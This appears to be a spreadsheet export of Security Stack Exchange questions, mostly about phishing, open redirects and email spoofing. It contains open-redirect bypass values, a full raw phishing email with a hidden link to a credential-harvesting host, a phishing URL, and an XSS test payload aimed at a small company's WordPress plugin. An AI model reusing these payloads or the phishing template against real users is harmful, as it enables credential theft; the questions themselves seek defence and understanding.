    <t>&lt;malware&gt;&lt;phishing&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Defending site against being abused by phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;Say you have a web site and you are using some &lt;code&gt;returnUrl&lt;/code&gt; URL parameter to redirect user back to page where he was after login or editing some records in user area. Is there some standard way how to check if the &lt;code&gt;returnUrl&lt;/code&gt; is located on same server as the web application?&lt;/p&gt;
 &lt;p&gt;So far I figured out, that there are two ways how atacker can redirect user elsewhere and following actions can be performed to prevent these attacks:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Attacker supplies whole URL in the parameter (http://evil.com/) - here it is possible to check if parameter contains &lt;code&gt;http(s)://&lt;/code&gt; or &lt;code&gt;ftp://&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;Browser automatically adds the protocol if it is missing, so attacker can provide something like &lt;code&gt;//evil.com&lt;/code&gt; or &lt;code&gt;//numeric_ip_address&lt;/code&gt; and it will redirect user outside the server too - here you can still check if URL starts with the &lt;code&gt;//&lt;/code&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Are there any other ways to encode URL address? Can I be sure that the parameter cannot be misused if I check only previous two cases?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;appsec&gt;&lt;web-application&gt;&lt;penetration-test&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>"Phishing Attack Ahead" warning on Apple Mail link preview</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a suspicious email and moved it to my spam folder. I kept getting the same email so I blocked the sender.&lt;/p&gt;
 &lt;p&gt;I got curious about the link in it and pressed the dropdown arrow on Mac mail to preview the link. It was my understanding this doesn't actually open the link.&lt;/p&gt;
 &lt;p&gt;The preview showed a red page with a Phishing Attack Ahead warning from PixelMe.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I didn't actually open the link on my browser.&lt;/li&gt;
 &lt;li&gt;I ran an Avast scan and came out clean.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I am worried if I should do something else to be safe or if am I being paranoid. I am very involved in the crypto world and I'm aware of how many threats there are.&lt;/p&gt;
 &lt;p&gt;I've attached screenshots of the email, the dropdown, and the preview.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ZGlMU.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ZGlMU.png" alt="Email" /&gt;&lt;/a&gt;&lt;a href="https://i.stack.imgur.com/WXTUJ.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/WXTUJ.jpg" alt="enter image description here" /&gt;&lt;/a&gt;&lt;a href="https://i.stack.imgur.com/K0IIl.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/K0IIl.png" alt="Phishing Alert" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>How Concerning Is This X-CU-modified: FAKECU Text Attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;A user clicked on the link of this email and entered their credentials, thinking the message was legitimate. However, the link didn't redirect to the fake site, and instead their mail client sent them to the link as it was displayed (the real mail server's web portal).&lt;/p&gt;
 &lt;p&gt;What is this (from the raw email)?
 &lt;code&gt;X-CU-modified: FAKECU Text https: //mail.dept.example.com/ to https: //gradingzimbra.000webhostapp.com/&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;And which type of mail clients would actually go to the fake website?&lt;/p&gt;
 &lt;p&gt;The message appears to be duplicated in HTML, but didn't seem to render in the user's Apple mail, or in my Google Apps mail when the original email was forwarded to me.&lt;/p&gt;
 &lt;p&gt;I'm not sure it why it didn't go to spam for the user, and I don't want to send out an unnecessary warning if this attack is not actually effective. Is it?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Original Message
 Message ID &amp;lt;22037855.28441569517194413.JavaMail.root@mail.metrocat.com&amp;gt;
 Created at: Thu, Sep 26, 2019 at 12:59 PM (Delivered after 7 seconds)
 From: "Admin@dept.example.com" &amp;lt;thanadet.kupv@metrocat.com&amp;gt; Using Zimbra 6.0.0_RC1_1684.RHEL5 (zclient/6.0.0_RC1_1684.RHEL5)
 To: 
 Subject: FOR ALL USER !!
 SPF: NEUTRAL with IP 128.b.c.d Learn more
 Download Original Copy to clipboard 
 Delivered-To: louis@example.com
 Received: by 2002:a02:a119:0:0:0:0:0 with SMTP id f25csp2412359jag;
  Thu, 26 Sep 2019 10:00:02 -0700 (PDT)
 X-Google-Smtp-Source: APXvYqzfEjcMNIfl22lzB/LJ5Fh5yGrFWMGw9MPMkzUFnZnVmFTP+kqrft7Vmfd6VduO6bJHSXb/
 X-Received: by 2002:a37:a544:: with SMTP id o65mr4262426qke.422.1569517202451;
  Thu, 26 Sep 2019 10:00:02 -0700 (PDT)
 ARC-Seal: i=1; a=rsa-sha256; t=1569517202; cv=none;
  d=google.com; s=arc-20160816;
  b=In55GzFNV3oDe+r4J7H4DRMa13eVGkjJrAf4J6UOxr7GyOvR299PuAI+L0t29DQkR
  Jy7+wQNHh0LOJUwm1ilNJisGyTu9F2ZYO4Zz+N74Y4VTa7nR2kzRaL9Gj2aZPrzl7AK8
  m6ck9kvqTdrtBzf1vkaJdOfbOWKzPkZPYyH3Cx0buS8pzMaBqgF+Qlo2vEu4SuY0vfTi
  JMnhk0xxbgsm9TYxrqsM+68QQNRfrIE89nUni7aWF8RFSzIXYHX9/+ikjfYYmlguHcu3
  ljUnMyz2rPWabkUdvm8EEZs7JL4y4jrKXQGGo4iRts48CWrWy6mJ/FCr28Z1E2JfwkWE
  qnLQ==
 ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
  h=to:mime-version:subject:message-id:reply-to:from:date;
  bh=0C1ERzO2hJ1GD5BjS+y2OCbaEwwYX8Typ8cL6/mkJwA=;
  b=kEBII9kQXej2zV9T4NIvZqT3DXkSOngnV65ud7Mg/Fu3zIL+6ztbptLl/gcmMt+Zlu
  VHaTkRSRs3/0heij/rMMXrWqXStwqwYadLbGMdSdM8c6TXqkTX9S12P6XzCQ0HJ+HSpn
  yQ/H+klxw6vXt2EpYPRW7gBkhQMAuixOefS1y5zSvu3FxWGnuij97txDy5D4qCwQkTM
  AyHaCKPD8TiCYCf4V9Qxt3wNPAyxZSshOVRMR7BqdAZWpN0cmzEf60xu4OlShuiHmZ23
  X88XHhBYkgxViHw3dfTxVJLADiLJIjJDCQ5yhgq+Ffvp+uKSl7ZAyLta0aa6rVIjHk4B
  n8GA==
 ARC-Authentication-Results: i=1; mx.google.com;
  spf=neutral (google.com: 128.b.f.e is neither permitted nor denied by domain of thanadet.kupv@metrocat.com) smtp.mailfrom=thanadet.kupv@metrocat.com
 Return-Path: &amp;lt;thanadet.kupv@metrocat.com&amp;gt;
 Received: from inprodmail06.cc.example.com (inprodmail06.cc.example.com. [128.b.c.d])
  by mx.google.com with ESMTPS id l8si2249383qkj.114.2019.09.26.10.00.00
  (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
  Thu, 26 Sep 2019 10:00:01 -0700 (PDT)
 Received-SPF: neutral (google.com: 128.b.f.g is neither permitted nor denied by domain of thanadet.kupv@metrocat.com) client-ip=128.b.f.g;
 Authentication-Results: mx.google.com;
  spf=neutral (google.com: 128.b.f.g is neither permitted nor denied by domain of thanadet.kupv@metrocat.com) smtp.mailfrom=thanadet.kupv@metrocat.com
 Received: from dept.example.com (paradox.dept.example.com [128.b.f.g]) by inprodmail06.cc.example.com (8.14.4/8.14.4) with ESMTP id x8QGxw1i010520 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO); Thu, 26 Sep 2019 12:59:58 -0400
 Received: from localhost (localhost [127.0.0.1]) by dept.example.com (Postfix) with ESMTP id 79621401790; Thu, 26 Sep 2019 12:59:47 -0400 (EDT)
 X-Virus-Scanned: amavisd-new at dept.example.com
 Received: from dept.example.com ([127.0.0.1]) by localhost (dept.example.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id RDcz4Gx9SWav; Thu, 26 Sep 2019 12:59:46 -0400 (EDT)
 Received: from mail.metrocat.com (mail.metrocat.com [203.130.129.172]) by dept.example.com (Postfix) with ESMTP id 958BB40178F; Thu, 26 Sep 2019 12:59:45 -0400 (EDT)
 Received: from localhost (localhost.localdomain [127.0.0.1]) by mail.metrocat.com (Postfix) with ESMTP id 2D3821E805E; Thu, 26 Sep 2019 23:59:55 +0700 (ICT)
 X-Virus-Scanned: amavisd-new at metrocat.com
 Received: from mail.metrocat.com ([127.0.0.1]) by localhost (mail.metrocat.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id x2nHz3R7dvL1; Thu, 26 Sep 2019 23:59:54 +0700 (ICT)
 Received: from mail.metrocat.com (mail.metrocat.com [203.130.129.172]) by mail.metrocat.com (Postfix) with ESMTP id 832671D8015; Thu, 26 Sep 2019 23:59:54 +0700 (ICT)
 Date: Thu, 26 Sep 2019 23:59:54 +0700 (ICT)
 From: "Admin@dept.example.com" &amp;lt;thanadet.kupv@metrocat.com&amp;gt;
 Reply-To: "Admin@dept.example.com" &amp;lt;noreply@dept.example.com&amp;gt;
 Message-ID: &amp;lt;22037855.28441569517194413.JavaMail.root@mail.metrocat.com&amp;gt;
 Subject: FOR ALL USER !!
 MIME-Version: 1.0
 Content-Type: multipart/alternative; boundary="----=_Part_2519_3754648.1569517194412"
 X-Originating-IP: [105.112.96.85]
 X-Mailer: Zimbra 6.0.0_RC1_1684.RHEL5 (zclient/6.0.0_RC1_1684.RHEL5)
 To: undisclosed-recipients:;
 X-CU-modified: FAKECU Text https: //mail.dept.example.com/ to https: //gradingzimbra.000webhostapp.com/
 X-Spam-Score: 3.502 (***) CU_PHISH_42 CU_SUBJECT_BANGBANG HTML_MESSAGE HTTPS_HTTP_MISMATCH KHOP_HELO_FCRDNS SUBJ_ALL_CAPS TVD_PH_BODY_ACCOUNTS_PRE CU_SPF_neutral
 X-Scanned-By: MIMEDefang 2.84 on 128.b.c.d
 ------=_Part_2519_3754648.1569517194412
 Content-Type: text/plain; charset=utf-8
 Content-Transfer-Encoding: 7bit
  Zimbra Mail Support your account has been
 successfully updated to the latest version of Zimbra mail server with 2G 8.0.8
 additional space on the web. You can now access the latest 8.0.8 version of the
 Zimbra email by clicking on the links below protected administrator, sign in
 with your username and password to access the latest version 8.0.8 of the
 software code open Zimbra server email server and client devices to messaging
 and collaboration faster.
 https://mail.dept.example.com/
 Greetings,
 Tim Zimbra Webmail.
 ------=_Part_2519_3754648.1569517194412
 Content-Type: text/html; charset=utf-8
 Content-Transfer-Encoding: 7bit
 &amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;style&amp;gt; body {height: 100%; color:#000000; font-size:12pt; font-family:Times New Roman,helvetica,clean,sans-serif;}&amp;lt;/style&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height:
 normal;background:white"&amp;gt;&amp;lt;span style="font-size:12.0pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,&amp;amp;quot;sans-serif&amp;amp;quot;;
 mso-fareast-font-family:&amp;amp;quot;Times New Roman&amp;amp;quot;;color:#222222"&amp;gt;&amp;lt;span style="mso-spacerun:yes"&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/span&amp;gt;Zimbra Mail Support your account has been
 successfully updated to the latest version of Zimbra mail server with 2G 8.0.8
 additional space on the web. You can now access the latest 8.0.8 version of the
 Zimbra email by clicking on the links below protected administrator, sign in
 with your username and password to access the latest version 8.0.8 of the
 software code open Zimbra server email server and client devices to messaging
 and collaboration faster.&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
 &amp;lt;p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height:
 normal;background:white"&amp;gt;&amp;lt;span style="font-family:&amp;amp;quot;Arial&amp;amp;quot;,&amp;amp;quot;sans-serif&amp;amp;quot;;
 color:#0070C0"&amp;gt;&amp;lt;!-- &amp;lt;a href="https://gradingzimbra.000webhostapp.com/"&amp;gt; --&amp;gt;&amp;lt;span style="color:#0070C0"&amp;gt;https://mail.dept.example.com/&amp;lt;/span&amp;gt;&amp;lt;!-- &amp;lt;/a&amp;gt; --&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span style="font-size:12.0pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,&amp;amp;quot;sans-serif&amp;amp;quot;;mso-fareast-font-family:
 &amp;amp;quot;Times New Roman&amp;amp;quot;;color:#222222"&amp;gt;&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
 &amp;lt;p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height:
 normal;background:white"&amp;gt;&amp;lt;span style="font-size:12.0pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,&amp;amp;quot;sans-serif&amp;amp;quot;;
 mso-fareast-font-family:&amp;amp;quot;Times New Roman&amp;amp;quot;;color:#222222"&amp;gt;Greetings,&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
 &amp;lt;p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height:
 normal;background:white"&amp;gt;&amp;lt;span style="font-size:12.0pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,&amp;amp;quot;sans-serif&amp;amp;quot;;
 mso-fareast-font-family:&amp;amp;quot;Times New Roman&amp;amp;quot;;color:#222222"&amp;gt;Tim Zimbra Webmail.&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 ------=_Part_2519_3754648.1569517194412--
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;spoofing&gt;&lt;url-redirection&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>How to exploit XSS in the Accept-Language header</t>
  </si>
  <si>
    <t>&lt;p&gt;I found a potential vulnerability on a website of a small local company in my town (I know them personally and of course I'll report it). However I thought it'd be a nice opportunity to learn and experiment a bit.&lt;/p&gt;
 &lt;p&gt;The website runs Wordpress including an &lt;a href="https://wpvulndb.com/vulnerabilities/8173" rel="nofollow noreferrer"&gt;outdated plugin&lt;/a&gt;. Due to that outdated plugin there is supposed to be a XSS-vulnerability in the Accept-Language header.
 It seems XSS in the Accept-Language header is common, however I can't seem to figure out how to exploit it.&lt;/p&gt;
 &lt;p&gt;I thought I'd just have to modify the HTTP-request and make the Accept-Language header Javascript code, e.g: &lt;code&gt;"&amp;gt;&amp;lt;script&amp;gt;alert(0)&amp;lt;/script&amp;gt;&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;However that didn't gave any result, I didn't got an alert box, nor did I saw a trace of the Javascript-code in the source.&lt;/p&gt;
 &lt;p&gt;So (&lt;strong&gt;TL;DR&lt;/strong&gt;), how would I exploit a XSS-vulnerability when it's in the Accept-Language header, and what would be a realistic scenario in how this could be dangerous? Because unlike reflective XSS you can't include this in e.g mails for phishing/...&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is update@em.facebookmail.com legitimate?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm having a hard time figuring out whether this email a friend of mine got is legit or a scam. The weird thing is there's only one link to facebook.com, which is the one about facebook terms. All the others are linking to em.facebookmail.com with a very long funny characters to follow. Another thing that raised suspicion was a particular grammar error and one link in Spanish. I tried searching online but all I got was opinions that are hardly believable.&lt;/p&gt;
 &lt;p&gt;What should I do to check whether it's legitimate or not?&lt;/p&gt;
 &lt;p&gt;EDIT&lt;/p&gt;
 &lt;p&gt;Example link:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;code&gt;http://em.facebookmail.com/pub/cc?_ri_=X0Gzc2X%3DWQpglLjHJlYQGiwzdEDAO0fUMeSfY0IMLolh6nzetzfLzezfta6mNVXtpKX%3DSRYACT&amp;amp;_ei_=EnIKw7ZfezfaO818iGCS8OKM3wsHi9t5aeegB28nNXF-_-Ez1lKT0ISXpmmPx__JHh89daMZ-yh6R9JdxOQ6mLdT7_9cfymEL6iQFvpa4lV1YWogx7vG--iplcrBEso.&lt;/code&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Email Security Gateway vs Firewall</t>
  </si>
  <si>
    <t>&lt;p&gt;An email security gateway is an edge device such a router that serves for relaying the external network with the private network. It helps with detecting and blocking spams and phishing emails. That being said, I would like to know :&lt;/p&gt;
 &lt;p&gt;1) What is the difference between an email security gateway and firewall ? Could an email security gateway be considered as an smtp proxy ?&lt;/p&gt;
 &lt;p&gt;2) Does an email security gateway run an MTA or a UA?&lt;/p&gt;
 &lt;p&gt;3) How does it detect spams and phishing emails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firewalls&gt;&lt;smtp&gt;</t>
  </si>
  <si>
    <t>Is this email from DigiCert about SSL certificates genuine?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few days ago, I received the email below (supposedly) from DigiCert, about an SSL certificate. I &lt;em&gt;am&lt;/em&gt; the owner of the domain (redacted to example.com) but I guess it's kind of trivial to look this up somewhere. The certificate is backed up by an intermediate certificate authority named "Trust Provider B.V. DV SSL CA - G2" and was bought from a company named Version, not Whitelabel. Frankly, I've never seen that name before. I've seen that &lt;a href="https://www.digicert.com/news/digicert-to-acquire-symantec-website-security-business/" rel="nofollow noreferrer"&gt;Digicert acquired some website business from Symantec&lt;/a&gt; but that was half a year ago.&lt;/p&gt;
 &lt;p&gt;Is this a real e-mail or a phishing attempt?&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear Domain Administrator,&lt;/p&gt;
  &lt;p&gt;We've received a Whitelabel certificate request for example.com. (With
  DigiCert's recent acquisition of Whitelabel, we're now responsible for
  processing your order.)&lt;/p&gt;
  &lt;p&gt;Order info:&lt;br&gt;
  Domain name: example.com&lt;br&gt;
  Order number: [redacted]&lt;br&gt;
  Ordered on: 5 Mar 2018&lt;br&gt;
  Certificate type: DV&lt;/p&gt;
  &lt;p&gt;What's next?&lt;/p&gt;
  &lt;p&gt;Before we can issue your certificate, approve the request to verify
  that you control example.com.&lt;/p&gt;
  &lt;p&gt;View the order details and complete the request here (link is valid
  for 30 days):
  &lt;a href="https://dcv.digitalcertvalidation.com/link/domain-control-validation/?t=[redacted]" rel="nofollow noreferrer"&gt;https://dcv.digitalcertvalidation.com/link/domain-control-validation/?t=[redacted]&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Contact us if you have questions or need to reject the request here:
  (801) 441-6086&lt;/p&gt;
  &lt;p&gt;Why am I getting this email from DigiCert?&lt;/p&gt;
  &lt;p&gt;Recently, DigiCert acquired Whitelabel and all of its SSL/TLS
  services. While there will continue to be changes to Whitelabel as we
  build a stronger website security platform, we can promise you that
  things will get better and that we will continue to dedicate ourselves
  to providing you with the best website security experience possible.&lt;/p&gt;
  &lt;p&gt;Thank you,&lt;br&gt;
  Whitelabel Customer Support&lt;br&gt;
  (801) 441-6086&lt;br&gt;
  Support ID: [redacted]&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificates&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>CIS MDBR blocking major libraries (jQuery, gstatic)</t>
  </si>
  <si>
    <t>&lt;p&gt;The organization I work for uses &lt;a href="https://www.cisecurity.org/ms-isac/services/mdbr/" rel="nofollow noreferrer"&gt;Malicious Domain Blocking and Reporting&lt;/a&gt; (MDBR), which is a service provided by Center for Internet Security (CIS). MDBR technology prevents IT systems from connecting to harmful web domains, helping limit infections related to known malware, ransomware, phishing, and other cyber threats. (&lt;a href="https://www.cisecurity.org/blog/malicious-domain-blocking-and-reporting-mdbr-newest-service-for-u-s-sltts/" rel="nofollow noreferrer"&gt;source&lt;/a&gt;) From what I gather this is a new tool and has been adopted primarily by government agencies.&lt;/p&gt;
 &lt;p&gt;Recently two major application libraries were identified as malicious content: &lt;code&gt;code.jQuery.com&lt;/code&gt; and &lt;code&gt;fonts.gstatic.com&lt;/code&gt;. Applications were in a broken state until we alerted our security team that there was an issue. Their feedback was essentially: We don't have control over what is included on the MDBR block list. We trust CIS and if they are blocking there is a good reason for it.&lt;/p&gt;
 &lt;p&gt;Can anyone with experience with this security tool speak to the issue? Have you seen major assets be blocked by MDBR? If so, how did you remedy the issue? It is alarming that jQuery would be blocked. If it is a legitimate concern the entire programming/security community would be screaming. If it isn't, why is it on the MDBR block list?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firewalls&gt;&lt;dns&gt;</t>
  </si>
  <si>
    <t>Is it possible to setup a phishing ‚Äúhoneypot‚Äù for proof-of-concept purposes without getting the host/IP blacklisted?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the company I work for, we have many clients and the vast majority of them have hosting with us and we make their web apps. One client, though, just applied for cyber security. Our CEH (certified ethical hacker) asked me to make an exact replica of the client's login site to test phishing on their cloud service. All legal by contract.&lt;/p&gt;
 &lt;p&gt;I asked &lt;a href="https://superuser.com/questions/1606227/how-best-test-phishing-cyber-security?noredirect=1#comment2448362_1606227"&gt;this same&lt;/a&gt; question in the wrong community where &lt;a href="https://superuser.com/users/167207/giacomo1968"&gt;Giacomo1968&lt;/a&gt; steered me in the right direction. So to be clear: &lt;strong&gt;The reason for the following is we had to prove to our client that their cloud login site can be replicated and published to a &lt;em&gt;very&lt;/em&gt; similar domain, which is used for stealing login data.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I made the replica (down to a pixel), and backend that stores username and password (plaintext) to a database and sends an email to our CEH with the phished data.&lt;/p&gt;
 &lt;p&gt;So far, so good, but during the development process (last hour or two) a refreshed and reloaded both original and replicated pages several times.&lt;/p&gt;
 &lt;p&gt;Then when I was already finished, I refreshed the original site one last time (for no reason at all), and Google Chrome sent out a known alert:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/xUvoy.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/xUvoy.jpg" alt="Chrome-ChangePassword" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This got me worried that Google might tag our company IP as &lt;em&gt;malicious&lt;/em&gt;, resulting in many problems for our other clients who have their websites reachable at our IP address.&lt;/p&gt;
 &lt;p&gt;I have HTML markup linked with some CSS and JS and in the JS I use Fetch API to call a PHP script which in turn stores username-password combination to database along with &lt;code&gt;NOW()&lt;/code&gt; and then send an email with PHPMailer.&lt;/p&gt;
 &lt;p&gt;Should the phishing site have some tags or something which tell Google it's a cyber-security test or perhaps I'm going about the wrong way entirely. Or, hopefully not, there is just no chance and one should never put such code on server. If so, how do you test this locally if intended users can't browse there?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;chrome&gt;</t>
  </si>
  <si>
    <t>Why does Sage Ransomeware blacklist League of Legends, steamapps, etc.?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was recently reading &lt;a href="https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/?utm_source=double-opt-in&amp;#038;utm_medium=email-internal-b2c&amp;#038;utm_campaign=EM-B2C-2017-April-newsletter-issue1&amp;#038;utm_content=sage-ransomware" rel="nofollow noreferrer"&gt;the Malwarebytes Labs threat analysis for Sage Ransomware&lt;/a&gt;. I found it interesting to learn that, apparently, in addition to system directories, which makes sense, paths to games like League of Legends as well as the path to steamapps are excluded from the attack. The article does not speculate on why this is the case, which leaves me curious and speculating to myself. Is there any readily apparent reason why the malware's creators did this? Or am I just overthinking it? Is it indicative of a target demographic, attack vector, and/ or delivery method? The only potentially &lt;em&gt;obvious&lt;/em&gt; reason that I can think of for why this may have been done is so as not to interrupt a distracted gamer, and thus allowing the process to continue to run in the background less likely to be noticed by the user. However, I feel like that is too simple an explanation. I would venture that the average computer user would not recognize the signs of infection even if they weren't engrossed in some game or task on the system. As is intrinsically the case with the vast majority of ransomware, the target demographic is typically the casual user who is less likely to back up their data than a power user who would be more likely to notice the signs of infection, which makes this explanation seem even less likely. Considering most data for many games is not stored locally (with the majority of data that is stored locally also backed up in the cloud, as is the case with Steam) and license keys are now often managed by a digital distribution platform, I can see why it would be almost pointless to encrypt those files.* Even still, I would venture that encrypting those files would further contribute to the sense of invasion/ vulnerability/ loss experienced by the victim. From a social engineering/ psychological standpoint, this would likely increase chances of the victim paying the ransom. Am I just giving the creator(s) too much credit? A move like this seems like a very deliberate thing to do, which leaves me very curious as the motivation.&lt;/p&gt;
 &lt;p&gt;Recognizing that trying to determine or ascertain Sage coders' actual motivation for their programming decisions will more be a matter of opinion and speculation than fact, my question boils down to two questions that I encountered in speculating:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What versions of windows are typically targeted? Is it similar to &lt;a href="https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/" rel="nofollow noreferrer"&gt;how WannaCry spread&lt;/a&gt;, targeting a wide variety of Windows OS's? Or was it more focused on home user OS's (e.g. XP, Vista, 7) versus commercial OS's (e.g. Windows Server 2000, 2008)?&lt;/li&gt;
 &lt;li&gt;In what was has Sage been spread/ dropped? As the article states, "Most often, Sage is dropped by downloader scripts distributed via phishing e-mails." However, since the article states that one of the forms in which it was dropped was a standalone JavaScript file, this opens up numerous potential attack vectors. I'm curious to know if anyone is aware of any other attack vectors that Sage has used, if any at all.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;*Speaking mainly about online-only games like League of Legends where the user's profile information is stored online. However, Sage excludes the entire steamapps paths, which is also where save information for local only/ single player games is stored.&lt;/p&gt;
 &lt;p&gt;UPDATE: Just to clarify, I understand why it makes logical sense to attempt to prevent from encrypting low value, easily replaceable files. However, what I find interesting is the methodology used by the coders to accomplish this. Arguably, you could generate a blacklist the specifies at least a hundred directories where low value data and files are typically stored for various use cases. However, the coders only excluded very specific file paths from encryption. Would it not makes more sense, if your goal is to encrypt as much of the highest value data as possible as quickly as possible, to try to target the encryption to file paths where the most valuable data is most typically stored? This would narrow the scope of the files being encrypted and increase the chances of catching something valuable enough to motivate a user to pay the ransom.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;ransomware&gt;</t>
  </si>
  <si>
    <t>Should we trust online banks with our credit card information?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm thinking of buying a product for someone using the steam platform. Being in Germany, the best (least expensive) option would be to use a local bank. Logging in, choosing a product and checking out lands you on the following page:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/esaWP.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/esaWP.png" alt="steam store"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ruVut.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ruVut.png" alt="steam store"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/fUZ7H.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/fUZ7H.png" alt="steam store"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;"Continue" redirects to the banking site and it contains two tokens. On the site itself the BIC and PIN number are required to finalize the transaction. The certificates of both the store and the bank are valid. &lt;/p&gt;
 &lt;p&gt;What keeps the bank from performing further, malicious transactions with the supplied information? What happens in case of compromise? as performing a transaction in this case does not require a PIN generated by a physical token (anyone can buy as long as they know the BIC, the PIN and there are sufficient funds on that account).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;web-browser&gt;&lt;phishing&gt;&lt;banks&gt;</t>
  </si>
  <si>
    <t>Phishing Gmail account</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a mail from a friend who I was playing together in a multiplayer game. And it had a link to phishing page which would ask to login to view the file that the sent me. And my antivirus found it as a threat. I inspected the page it is a perfect template for phishing scam.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;hxxp://www.katiavale.com.br/fujitsu/note/index.html
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I want know when I am logged inside Gmail and if I click a link is there some way to access Gmail session data containing my authentication details using JavaScript even if I didn't do anything other than click on the link.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are there any known attacks (technical or social) against enterprises where password resets are scheduled on fixed (known) intervals?</t>
  </si>
  <si>
    <t>&lt;p&gt;A company I know of has a password policy that requires employees to change passwords (on AD server) every 90 days. The vast majority of its new hires start on the 1st of the month. Thus, several hundred password resets happen on a predictable schedule. My intuition tells me that this is tactically valuable information to an attacker (I am an infosec noob).&lt;/p&gt;
 &lt;p&gt;An attacker could enhance the standard &amp;quot;reply to this with your password&amp;quot; phish with a &amp;quot;reply to this with your password because it is time to change your password&amp;quot; phish. The latter seems less suspicious because the person who wrote the message knows about the password reset policy.&lt;/p&gt;
 &lt;p&gt;Are there any other attacks enhanced or made possible by a predictable password reset schedule?&lt;/p&gt;
